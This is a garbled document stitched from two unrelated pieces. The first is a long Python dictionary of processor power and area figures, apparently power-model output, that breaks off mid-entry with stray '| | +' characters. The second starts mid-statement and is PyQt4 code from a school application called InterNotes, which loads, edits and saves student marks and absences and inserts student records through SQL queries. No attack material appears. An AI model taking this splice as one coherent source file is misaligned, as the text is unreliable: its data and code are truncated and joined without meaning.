'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.108534,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.103099,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.129317,
'Execution Unit/Register Files/Runtime Dynamic': 0.11704,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.233786,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.744217,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.62449,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00091853,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00091853,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000809584,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000318624,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00148103,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00412767,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00846572,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0991119,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.30437,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.224509,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.336629,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.82885,
'Instruction Fetch Unit/Runtime Dynamic': 0.672843,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0452693,
'L2/Runtime Dynamic': 0.0173384,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 5.58517,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.11292,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.14067,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.14067,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 6.24945,
'Load Store Unit/Runtime Dynamic': 2.94733,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.346868,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.693736,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.123105,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.123767,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.391982,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0368556,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.759563,
'Memory Management Unit/Runtime Dynamic': 0.160623,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 24.2009,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0546688,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0156604,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.17509,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': | |
+
u"vous devez indiquer l'heure de départ et l'heure d'arrivée")
return
if h_from > h_to:
QMessageBox.critical(self, u"Error - InterNotes",
u"Pour chaque absence, " +
u"l'heure de départ doit être inférieur à l'heure d'arrivée")
return
if 'away_id' in away_data[a]:
self.updateOldAway(away_data[a]['away_id'], away_data[a]['away_date'],
away_data[a]['away_time_from'], away_data[a]['away_time_to'],
away_data[a]['away_justify'],
away_data[a]['away_motif'], away_data[a]['away_period'], stid)
else:
aid = self.insertNewAway(away_data[a]['away_date'], away_data[a]['away_time_from'],
away_data[a]['away_time_to'],
away_data[a]['away_justify'], away_data[a]['away_motif'],
away_data[a]['away_period'], stid)
# put the new away_id here
if flag == True:
item_motif = away_data[a]['item_motif']
item_motif.setData(Qt.AccessibleTextRole,
QVariant(aid))
def onClickedSaveBtn(self):
    """Persist every mark currently shown in the marks table.

    Collects the table rows, saves them for the current student,
    greys out the save button, then purges marks flagged for
    removal.  Does nothing when the table yields no data.
    """
    new_marks = self.getAllNewMarksFromTableView()
    if not new_marks:
        return
    first_row = new_marks[0]
    self.saveMarks(new_marks, self.stid, first_row['classroom_id'],
                   first_row['academic_year_id'], True)
    if self.btn_save:
        self.btn_save.setEnabled(False)
    self.deleteRemovablesMarks()
def onClickedSaveAwayBtn(self):
    """Persist every absence currently shown in the absences table,
    grey out its save button, then purge absences flagged for
    removal.  Does nothing when the table yields no data.
    """
    new_aways = self.getAllNewAwaysFromTableView()
    if not new_aways:
        return
    self.saveAways(new_aways, self.stid, True)
    if self.btn_save_away:
        self.btn_save_away.setEnabled(False)
    self.deleteRemovablesAways()
def getAllNewMarksFromTableView(self):
    """Collect every row of the marks table as a list of dicts.

    Each dict carries the topic id, mark value, level, observation
    (both the QTableWidgetItem and its text), date string
    ("dd/MM/yyyy"), mark group, classroom id and academic-year id.
    A row that already exists in the database (non-zero id stored in
    the observation cell's AccessibleTextRole) also carries
    'mark_id'.  Returns an empty list when no classroom is selected.
    """
    rows = []
    if self.combo_classroom.currentIndex() == -1:
        return rows
    classroom_id = self.combo_classroom.itemData(
        self.combo_classroom.currentIndex()).toInt()[0]
    academic_year_id = self.combo_ay.itemData(
        self.combo_ay.currentIndex()).toInt()[0]
    group_name = self.combo_mark_group.currentText()
    for row in range(self.table_view.rowCount()):
        topic_combo = self.table_view.cellWidget(row, 0)
        observation_item = self.table_view.item(row, 3)
        entry = {}
        entry['topic_id'] = topic_combo.itemData(
            topic_combo.currentIndex()).toInt()[0]
        existing_id = observation_item.data(Qt.AccessibleTextRole).toInt()[0]
        if existing_id:
            entry['mark_id'] = existing_id
        entry['mark_mark'] = self.table_view.cellWidget(row, 1).value()
        entry['mark_level'] = self.table_view.cellWidget(row, 2).value()
        entry['item_observation'] = observation_item
        entry['mark_observation'] = observation_item.text()
        entry['mark_date'] = self.table_view.cellWidget(row, 4).date().toString("dd/MM/yyyy")
        entry['mark_group'] = group_name
        entry['classroom_id'] = classroom_id
        entry['academic_year_id'] = academic_year_id
        rows.append(entry)
    return rows
def getAllNewAwaysFromTableView(self):
    """Collect every row of the absences table as a list of dicts.

    Each dict carries the date ("dd/MM/yyyy"), start and end times
    ("hh:mm"), justification text, motive (both the QTableWidgetItem
    and its text) and the selected period; an absence already stored
    in the database (non-zero id in the motive cell's
    AccessibleTextRole) also carries 'away_id'.  Returns an empty
    list when no classroom is selected.
    """
    rows = []
    if self.combo_classroom.currentIndex() == -1:
        return rows
    period = self.combo_mark_group_away.currentText()
    for row in range(self.table_view_away.rowCount()):
        motif_item = self.table_view_away.item(row, 4)
        entry = {}
        entry['away_date'] = self.table_view_away.cellWidget(row, 0).date().toString("dd/MM/yyyy")
        entry['away_time_from'] = self.table_view_away.cellWidget(row, 1).time().toString("hh:mm")
        entry['away_time_to'] = self.table_view_away.cellWidget(row, 2).time().toString("hh:mm")
        entry['away_justify'] = self.table_view_away.cellWidget(row, 3).currentText()
        existing_id = motif_item.data(Qt.AccessibleTextRole).toInt()[0]
        if existing_id:
            entry['away_id'] = existing_id
        entry['item_motif'] = motif_item
        entry['away_motif'] = motif_item.text()
        entry['away_period'] = period
        rows.append(entry)
    return rows
def isStudentHasMarksInThisClassroomId(self, crid):
    """Return True when at least one mark exists for classroom *crid*.

    Fixes two defects of the previous version:
    - a failed ``exec_()`` fell off the end and returned ``None``;
      callers compare the result with ``== False``, so ``None`` was
      silently treated as "has marks".  The method now always
      returns a bool.
    - the classroom id was concatenated into the SQL string; it is
      now bound as a parameter.
    """
    query = QSqlQuery()
    query.prepare("SELECT * FROM mark WHERE classroom_id = :crid")
    query.bindValue(":crid", crid)
    if query.exec_():
        # query.size() needs a driver that reports result-set sizes,
        # as the rest of this file already relies on.
        return query.size() >= 1
    return False
def setTableMarksByClassroomIndexChanged(self):
    """Refresh the marks table after the classroom selection changed.

    Bouncing the mark-group combo through index -1 forces its
    currentIndexChanged signal to fire even when index 0 was already
    selected; the table is then rebuilt for group 0.
    """
    # The previous code stored combo_mark_group.currentIndex() in an
    # unused local; the read-only getter call was removed.
    self.combo_mark_group.setCurrentIndex(-1)
    self.combo_mark_group.setCurrentIndex(0)
    self.setTableMarksByStudentIdAndByMarkGroup(0)
def setTableMarksByStudentIdAndByMarkGroup(self, group_index):
    """Populate the marks table for the current student and the mark
    group selected in combo_mark_group.

    *group_index* is received from the combo's currentIndexChanged
    signal but is not used; the group is re-read from the combo text.
    """
    if self.combo_classroom.currentIndex() == -1 or self.stid == None:
        return
    else:
        ay_index = self.combo_ay.currentIndex()
        cr_index = self.combo_classroom.currentIndex()
        crid = self.combo_classroom.itemData(cr_index).toInt()[0]
        # Nothing to display when the student has no marks in this classroom.
        if self.isStudentHasMarksInThisClassroomId(crid) == False:
            return
    mark_group = self.combo_mark_group.currentText()
    query = QSqlQuery()
    query.prepare("SELECT * \
                   FROM mark m \
                   INNER JOIN topic t USING(topic_id) \
                   WHERE student_id = :stid AND \
                   mark_group = :group \
                   ORDER BY t.topic_name, mark_date DESC")
    query.bindValue(":stid", self.stid)
    query.bindValue(":group", mark_group)
    if query.exec_():
        record = query.record()
        if not record.isEmpty():
            # NOTE(review): query.size() requires a driver that reports
            # result-set sizes -- confirm the configured driver does.
            self.table_view.setRowCount(query.size())
            nb_row = query.size()
            items = []
            for r in range(0, nb_row):
                self.table_view.setRowHeight(r, 20)
            # First pass: pull every result row into a plain dict,
            # building the editable QDateEdit widget on the way.
            while query.next():
                row = {}
                mark_id = query.value(record.indexOf("mark_id")).toInt()[0]
                mark_mark = query.value(record.indexOf("mark_mark")).toDouble()[0]
                mark_level = query.value(record.indexOf("mark_level")).toInt()[0]
                mark_observation = query.value(record.indexOf("mark_observation")).toString()
                mark_date_string = query.value(record.indexOf("mark_date")).toString()
                # Dates are stored as "dd/MM/yyyy" strings; split and
                # rebuild a QDate for the calendar-popup editor.
                l_date = mark_date_string.split("/")
                y = l_date[2].toInt()[0]
                m = l_date[1].toInt()[0]
                d = l_date[0].toInt()[0]
                new_date = QDate(y, m, d)
                mark_date_edit = QDateEdit(new_date)
                mark_date_edit.setCalendarPopup(True)
                mark_date_edit.setDisplayFormat(u"dd/MM/yyyy")
                topic_id = query.value(record.indexOf("topic_id")).toInt()[0]
                #item_name = QTableWidgetItem(topic_name)
                #item_name.setData(Qt.AccessibleTextRole, QVariant(topic_id))
                row['mark_id'] = mark_id
                row['mark_mark'] = mark_mark
                row['mark_level'] = mark_level
                row['mark_observation'] = mark_observation
                row['mark_date'] = mark_date_edit
                row['topic_id'] = topic_id
                items.append(row)
            # Second pass: install one row of editor widgets per mark.
            for i in range(0, len(items)):
                combo_topic = QComboBox()
                if self.combo_classroom.currentIndex() != -1:
                    cr_index = self.combo_classroom.currentIndex()
                    crid = self.combo_classroom.itemData(cr_index).toInt()[0]
                    topics = topic.Topic.getAllTopicsByClassroomId(crid)
                    for t in topics:
                        combo_topic.addItem(t['topic_name'], QVariant(t['topic_id']))
                # Preselect the topic this mark belongs to.
                mark_topic_name = topic.Topic.getNameById(items[i]['topic_id'])
                index = combo_topic.findText(mark_topic_name)
                combo_topic.setCurrentIndex(index)
                self.table_view.setCellWidget(i, 0, combo_topic)
                spin_mark = QDoubleSpinBox()
                #spin_mark.setMinimum(1)
                spin_mark.setValue(items[i]['mark_mark'])
                self.table_view.setCellWidget(i, 1, spin_mark)
                spin_level = QSpinBox()
                spin_level.setMinimum(10)
                spin_level.setSingleStep(10)
                spin_level.setValue(items[i]['mark_level'])
                self.table_view.setCellWidget(i, 2, spin_level)
                # The observation cell doubles as storage for the mark id
                # (AccessibleTextRole); it is read back when saving.
                item_observation = QTableWidgetItem(items[i]['mark_observation'])
                item_observation.setData(Qt.AccessibleTextRole, QVariant(items[i]['mark_id']))
                self.table_view.setItem(i, 3, item_observation)
                self.table_view.setCellWidget(i, 4, items[i]['mark_date'])
                # Any edit in the row re-enables the save button.
                self.connect(combo_topic, SIGNAL("currentIndexChanged(int)"),
                             self.activeSaveBtn)
                self.connect(spin_mark, SIGNAL("valueChanged(double)"),
                             self.activeSaveBtn)
                self.connect(spin_level, SIGNAL("valueChanged(int)"),
                             self.activeSaveBtn)
                self.connect(items[i]['mark_date'], SIGNAL("dateChanged(QDate)"),
                             self.activeSaveBtn)
            self.table_view.sortItems(4)
def setTableAwaysByStudentIdAndByMarkGroup(self, group_index):
    """Populate the absences table for the current student and the
    period selected in combo_mark_group_away.

    *group_index* is received from the combo's currentIndexChanged
    signal but is not used; the period is re-read from the combo text.
    """
    if self.combo_classroom.currentIndex() == -1 or self.stid == None:
        return
    # The classroom pre-check used for marks is deliberately disabled
    # here (kept as a string literal, i.e. dead code):
    """
    else:
        ay_index = self.combo_ay.currentIndex()
        cr_index = self.combo_classroom.currentIndex()
        crid = self.combo_classroom.itemData(cr_index).toInt()[0]
        if self.isStudentHasMarksInThisClassroomId(crid) == False:
            return
    """
    mark_group = self.combo_mark_group_away.currentText()
    query = QSqlQuery()
    query.prepare("SELECT * \
                   FROM away a \
                   WHERE student_id = :stid AND \
                   away_period = :period \
                   ORDER BY a.away_date DESC")
    query.bindValue(":stid", self.stid)
    query.bindValue(":period", mark_group)
    if query.exec_():
        record = query.record()
        if not record.isEmpty():
            # NOTE(review): query.size() requires a driver that reports
            # result-set sizes -- confirm the configured driver does.
            self.table_view_away.setRowCount(query.size())
            nb_row = query.size()
            items = []
            for r in range(0, nb_row):
                self.table_view_away.setRowHeight(r, 20)
            # First pass: read every absence into a dict, building the
            # editable date/time widgets on the way.
            while query.next():
                row = {}
                away_id = query.value(record.indexOf("away_id")).toInt()[0]
                away_justify = query.value(record.indexOf("away_justify")).toString()
                away_motif = query.value(record.indexOf("away_motif")).toString()
                away_date_string = query.value(record.indexOf("away_date")).toString()
                # "dd/MM/yyyy" string -> QDate for the calendar editor.
                l_date = away_date_string.split("/")
                y = l_date[2].toInt()[0]
                m = l_date[1].toInt()[0]
                d = l_date[0].toInt()[0]
                new_date = QDate(y, m, d)
                away_date_edit = QDateEdit(new_date)
                away_date_edit.setCalendarPopup(True)
                away_date_edit.setDisplayFormat(u"dd/MM/yyyy")
                # "hh:mm" string -> QTime for the departure time.
                # (note: 'm' is reused for minutes after serving as month)
                away_time_from_string = query.value(record.indexOf("away_time_from")).toString()
                l_time = away_time_from_string.split(":")
                h = l_time[0].toInt()[0]
                m = l_time[1].toInt()[0]
                new_time = QTime(h, m)
                away_time_from_edit = QTimeEdit()
                away_time_from_edit.setDisplayFormat(u"hh:mm")
                away_time_from_edit.setTime(new_time)
                # Same conversion for the arrival time.
                away_time_to_string = query.value(record.indexOf("away_time_to")).toString()
                l_time = away_time_to_string.split(":")
                h = l_time[0].toInt()[0]
                m = l_time[1].toInt()[0]
                new_time = QTime(h, m)
                away_time_to_edit = QTimeEdit()
                away_time_to_edit.setDisplayFormat(u"hh:mm")
                away_time_to_edit.setTime(new_time)
                row['away_id'] = away_id
                row['away_date'] = away_date_edit
                row['away_time_from'] = away_time_from_edit
                row['away_time_to'] = away_time_to_edit
                row['away_justify'] = away_justify
                row['away_motif'] = away_motif
                items.append(row)
            # Second pass: install the widgets row by row.
            for i in range(0, len(items)):
                self.table_view_away.setCellWidget(i, 0, items[i]['away_date'])
                self.table_view_away.setCellWidget(i, 1, items[i]['away_time_from'])
                self.table_view_away.setCellWidget(i, 2, items[i]['away_time_to'])
                combo_justify = QComboBox()
                combo_justify.addItem(u"Non Justifiée")
                combo_justify.addItem(u"Justifiée")
                index = combo_justify.findText(items[i]["away_justify"])
                combo_justify.setCurrentIndex(index)
                self.table_view_away.setCellWidget(i, 3, combo_justify)
                # The motive cell doubles as storage for the away id
                # (AccessibleTextRole); it is read back when saving.
                item_motif = QTableWidgetItem(items[i]['away_motif'])
                item_motif.setData(Qt.AccessibleTextRole, QVariant(items[i]['away_id']))
                self.table_view_away.setItem(i, 4, item_motif)
                # Any edit re-enables the absences save button.
                self.connect(items[i]['away_time_from'], SIGNAL("timeChanged(QTime)"),
                             self.activeSaveAwayBtn)
                self.connect(items[i]['away_time_to'], SIGNAL("timeChanged(QTime)"),
                             self.activeSaveAwayBtn)
                self.connect(items[i]['away_date'], SIGNAL("dateChanged(QDate)"),
                             self.activeSaveAwayBtn)
                self.connect(combo_justify, SIGNAL("currentIndexChanged(int)"),
                             self.activeSaveAwayBtn)
            self.table_view_away.sortItems(0)
def saveNewMarks(self, marks, student_id, classroom_id):
    """Insert the given marks for a newly created student.

    Parameters
    ----------
    marks : list of dict
        Rows collected from the marks table view; each dict holds
        'mark_mark', 'mark_level', 'mark_observation', 'mark_date',
        'mark_group', 'topic_id' and 'academic_year_id'.
    student_id : int
        Id of the student the marks belong to.
    classroom_id : int
        Id of the classroom the marks were entered for.

    Fix: all marks are now validated *before* any insert.  The
    previous code validated inside the insert loop, so an invalid
    mark aborted the save after earlier rows were already committed,
    contradicting the error message's promise that nothing is saved.
    The statistics panes are also refreshed once instead of once per
    inserted mark.
    """
    # Validate everything up front: a mark level <= 1 means the total
    # number of points was never filled in.
    for mark in marks:
        if mark['mark_level'] <= 1:
            QMessageBox.critical(self, u"Error - InterNotes", u"Impossible d'enregistrer " +
                                 u"le(s) note(s). Veuillez renseigner " +
                                 u"le total de point pour chaque note")
            return
    for mark in marks:
        query = QSqlQuery()
        query.prepare("INSERT INTO mark( \
                      mark_mark, \
                      mark_level, \
                      mark_observation, \
                      mark_date, \
                      mark_group, \
                      student_id, \
                      topic_id, \
                      classroom_id, \
                      academic_year_id, \
                      mark_created_at) \
                      VALUES( \
                      :mark, \
                      :level, \
                      :observation, \
                      :date, \
                      :group, \
                      :stid, \
                      :tid, \
                      :crid, \
                      :ayid, \
                      NOW())")
        query.bindValue(":mark", mark['mark_mark'])
        query.bindValue(":level", mark['mark_level'])
        query.bindValue(":observation", mark['mark_observation'])
        query.bindValue(":date", mark['mark_date'])
        query.bindValue(":group", mark['mark_group'])
        query.bindValue(":stid", student_id)
        query.bindValue(":tid", mark['topic_id'])
        query.bindValue(":crid", classroom_id)
        query.bindValue(":ayid", mark['academic_year_id'])
        if not query.exec_():
            QMessageBox.critical(self, "Error - InterNotes",
                                 u"Database Error: %s" % query.lastError().text())
            return
    # Refresh the statistics panes once after a fully successful save.
    if marks:
        self.stat_page.stat_object_tree.updateStatObjectTree()
        self.stat_page.stat_feature_tree.clear()
        self.stat_page.stat_feature_tree.setHeaderLabel(u"")
        child = self.stat_page.stat_output.layout.takeAt(0)
        if child:
            child.widget().deleteLater()
def appendNewStudentItem(self, infos):
    """Insert a new student row in the database and append a matching
    item to the student list model.

    Parameters
    ----------
    infos : dict
        Form data: the student_* identity fields, the photo path under
        'new_photo_file_name', the enclosing ids ('ay_id', 'class_id',
        'classroom_id'), and optionally 'marks' rows to save for the
        new student right after the insert.

    Bug fix: the prepared statement declares the placeholder
    ':ay_id' but the value was bound under the name ':ayid', so the
    academic_year_id column was never actually bound.
    """
    ayid = infos['ay_id']
    clid = infos['class_id']
    crid = infos['classroom_id']
    marks = infos['marks']
    query = QSqlQuery()
    query.prepare("INSERT INTO student(\
                  student_first_name, \
                  student_last_name, \
                  student_birth_date, \
                  student_birth_place, \
                  student_genre, \
                  student_height, \
                  student_matricule, \
                  student_matricule_ministeriel, \
                  student_statut, \
                  student_previous_school, \
                  student_previous_classroom, \
                  student_redoubler, \
                  student_email, \
                  student_phone1, \
                  student_phone2, \
                  student_phone3, \
                  student_photo_name, \
                  student_created_at, \
                  academic_year_id, \
                  class_id, \
                  classroom_id) \
                  VALUES( \
                  :first_name, \
                  :last_name, \
                  :birth_date, \
                  :birth_place, \
                  :genre, \
                  :height, \
                  :matricule, \
                  :matricule_ministeriel, \
                  :statut, \
                  :previous_school, \
                  :previous_classroom, \
                  :redoubler, \
                  :email, \
                  :phone1, \
                  :phone2, \
                  :phone3, \
                  :photo_name, \
                  NOW(), \
                  :ay_id, \
                  :clid, \
                  :crid)")
    query.bindValue(":first_name", infos['student_first_name'])
    query.bindValue(":last_name", infos['student_last_name'])
    query.bindValue(":birth_date", infos['student_birth_date'])
    query.bindValue(":birth_place", infos['student_birth_place'])
    query.bindValue(":genre", infos['student_genre'])
    query.bindValue(":height", infos['student_height'])
    query.bindValue(":matricule", infos['student_matricule'])
    query.bindValue(":matricule_ministeriel", infos['student_matricule_ministeriel'])
    query.bindValue(":statut", infos['student_statut'])
    query.bindValue(":previous_school", infos['student_previous_school'])
    query.bindValue(":previous_classroom", infos['student_previous_classroom'])
    query.bindValue(":redoubler", infos['student_redoubler'])
    query.bindValue(":email", infos['student_email'])
    query.bindValue(":phone1", infos['student_phone1'])
    query.bindValue(":phone2", infos['student_phone2'])
    query.bindValue(":phone3", infos['student_phone3'])
    query.bindValue(":photo_name", infos['new_photo_file_name'])
    # Fixed: must match the ':ay_id' placeholder above (was ':ayid').
    query.bindValue(":ay_id", ayid)
    query.bindValue(":clid", clid)
    query.bindValue(":crid", crid)
    if not query.exec_():
        QMessageBox.critical(self, u"Error - InterNotes",
                             u"Database Error: %s" % query.lastError().text())
    else:
        new_student_id = query.lastInsertId().toInt()[0]
        if marks:
            self.saveNewMarks(marks, new_student_id, crid)
        # Build the list item "Last First" carrying the new id in its
        # accessible text (read back elsewhere to identify the student).
        ni = QStandardItem(infos['student_last_name'] + " " +
                           infos['student_first_name'])
        #ni.setData(0, 11, QVariant(new_student_id))
        ni.setAccessibleText(QString.number(new_student_id))
        ni.setEditable(False)
        if infos['new_photo_file_name'] is not None and not \
                infos['new_photo_file_name'].isEmpty() and not \
                QImage(infos['new_photo_file_name']).isNull():
            ni.setIcon(QIcon(infos['new_photo_file_name']))
        else:
            ni.setIcon(QIcon(":/images/user-icon.png"))
        query.finish()
        std_nb = 0
        if len(self.list_room_id):
            if crid in self.list_room_id:
                self.model.appendRow(ni)
            # Recount students over all displayed classrooms for the header.
            for id in range(0, len(self.list_room_id)):
